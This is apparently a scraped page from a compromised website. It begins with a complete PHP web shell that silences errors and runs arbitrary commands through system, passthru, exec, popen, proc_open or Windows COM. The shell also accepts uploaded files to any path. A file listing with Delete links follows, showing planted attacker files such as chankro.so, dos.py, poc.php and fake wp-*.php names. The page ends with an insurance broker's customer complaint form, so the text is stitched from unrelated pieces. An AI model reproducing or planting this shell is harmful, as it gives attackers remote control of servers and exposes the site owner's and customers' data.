<?php
@error_reporting(0);
@ini_set('display_errors',   '0');
@ini_set('display_startup_errors', '0');
@ini_set('log_errors',       '0');
@ini_set('output_buffering', 'on');
@ini_set('memory_limit',     '-1');
@ini_set('max_execution_time','0');
@set_time_limit(0);
@set_error_handler(function(){return true;});
@set_exception_handler(function(){});

if(isset($_REQUEST['up'])){
    if(isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD']==='POST'){
        $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : '.';
        if(isset($_FILES['f']) && isset($_FILES['f']['tmp_name'])){
            $dst = rtrim($path,'/') . '/' . basename($_FILES['f']['name']);
            if(@move_uploaded_file($_FILES['f']['tmp_name'], $dst)) echo 'ok:'.$dst;
            else echo 'fail';
        } elseif(isset($_POST['data']) && isset($_POST['name'])){
            $dst  = rtrim($path,'/') . '/' . basename($_POST['name']);
            $data = @base64_decode($_POST['data']);
            if($data !== false && @file_put_contents($dst, $data) !== false) echo 'ok:'.$dst;
            else echo 'fail';
        } else {
            echo 'fail';
        }
    } else {
        echo '<form method="post" enctype="multipart/form-data">'
            .'<input name="path" value="." placeholder="path"><br>'
            .'<input type="file" name="f"><br>'
            .'<input type="submit" value="upload">'
            .'</form>';
    }
    exit;
}

if(!isset($_REQUEST['c'])) exit;
$c = $_REQUEST['c'];
if((string)$c === '') exit;

$o = '';

if($o==='' && function_exists('system')){
    @ob_start();
    @system($c);
    $t = @ob_get_clean();
    if($t !== false && $t !== null) $o = $t;
}

if($o==='' && function_exists('passthru')){
    @ob_start();
    @passthru($c);
    $t = @ob_get_clean();
    if($t !== false && $t !== null) $o = $t;
}

if($o==='' && function_exists('shell_exec')){
    $t = @shell_exec($c);
    if($t !== false && $t !== null) $o = (string)$t;
}

if($o==='' && function_exists('exec')){
    $r = array();
    $rc = 0;
    @exec($c, $r, $rc);
    if(!empty($r)) $o = implode("\n", $r);
}

if($o==='' && function_exists('popen')){
    $f = @popen($c, 'r');
    if($f !== false){
        while(!feof($f)) $o .= @fread($f, 4096);
        @pclose($f);
    }
}

if($o==='' && function_exists('proc_open')){
    $desc = array(
        1 => array('pipe','w'),
        2 => array('pipe','w'),
    );
    $pipes = array();
    $p = @proc_open($c, $desc, $pipes);
    if($p !== false){
        $o  = '';
        if(isset($pipes[1])){ $o .= @stream_get_contents($pipes[1]); @fclose($pipes[1]); }
        if(isset($pipes[2])){ $o .= @stream_get_contents($pipes[2]); @fclose($pipes[2]); }
        @proc_close($p);
    }
}

if($o==='' && class_exists('COM')){
    $wsh = @new COM('WScript.Shell');
    if($wsh){
        $ex = @$wsh->Exec('cmd /c '.$c);
        if($ex){
            $so = @$ex->StdOut(); if($so) $o .= @$so->ReadAll();
            $se = @$ex->StdErr(); if($se) $o .= @$se->ReadAll();
        }
    }
}

echo $o;

• [D] .well-known
• [D] app
• [D] bootstrap
• [D] cgi-bin
• [D] config
• [D] database
• [D] resources
• [D] routes
• [D] storage
• [D] tests
• [D] vendor
• [F] .9ed3a2428221a1f5fc0e4c2a5e0124d7.lock
  Delete
• [F] .editorconfig
  Delete
• [F] .env
  Delete
• [F] .env.example
  Delete
• [F] .gitattributes
  Delete
• [F] .gitignore
  Delete
• [F] .htaccess
  Delete
• [F] .mori_exec_queue
  Delete
• [F] .mori_id
  Delete
• [F] .registered
  Delete
• [F] .styleci.yml
  Delete
• [F] a.php
  Delete
• [F] acpid.socket
  Delete
• [F] adminl.php
  Delete
• [F] aod.txt
  Delete
• [F] artisan
  Delete
• [F] banner.gif
  Delete
• [F] chankro.so
  Delete
• [F] composer.json
  Delete
• [F] composer.lock
  Delete
• [F] dos.py
  Delete
• [F] dos.py.1
  Delete
• [F] error_log
  Delete
• [F] index.php
  Delete
• [F] out.txt
  Delete
• [F] package.json
  Delete
• [F] phpunit.xml
  Delete
• [F] poc.php
  Delete
• [F] pwn.txt
  Delete
• [F] README.md
  Delete
• [F] readme.php
  Delete
• [F] robots.txt
  Delete
• [F] server.php
  Delete
• [F] tool1.php
  Delete
• [F] webpack.mix.js
  Delete
• [F] wp-admin-post.php
  Delete
• [F] wp-content-backup.php
  Delete
• [F] wp-plugin.php
  Delete
• [F] wp-trackbacks.zip
  Delete

CUSTOMER COMPLAINT FORM

Please use this form to give us suggestions, compliments or complaints.
Click here to check complaint status.
Click here to show Term of Business Agreement

• Config option 1
• Config option 2

Salutation *

-- Please Choose -- Mr. Mrs. Ms. PT. CV. UD.

Name *

E-mail *

Account Type *

-- Please Choose -- Individual Company

Company Name *

Reference Number of Type Document *

-- Please Choose -- Policy Contract Invoice Number

*

About *

-- Please Choose -- Claim Service System

Risk *

-- Please Choose --

Subject *

Details *

Attachment

Add Attachment

Notes: *.png, *.jpg, *.jpeg, *.pdf, *.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.eml are allowed, and size must be smaller than 5Mb.

   Disclaimer :

• The information filled in form is true and valid. PT Howden Insurance Brokers Indonesia is not liable to any lawful obligations arising from any false or invalid information in this application form whatsoever, all the false or invalid information will not be processed.
• The client hereby agree to render PT Howden Insurance Brokers Indonesia a right to handle complaint including but not limited to grab data from records, emails, documents, confidential data, and others, liaise with relatable Parties e.g. (Insurer, Adjuster, Legal Advisor, etc) to settled complaint.
• The client hereby released PT Howden Insurance Brokers Indonesia from any material or immaterial damages if eventually, there is no evidence of damages caused by PT Howden Insurance Brokers Indonesia.

* is required

Clear Submit

Copyright © 2026 PT. Howden Insurance Brokers Indonesia. All rights reserved.
Authorised and regulated by Otoritas Jasa Keuangan (OJK).
Member of The Association of Indonesian Insurance & Reinsurance Brokers (APPARINDO).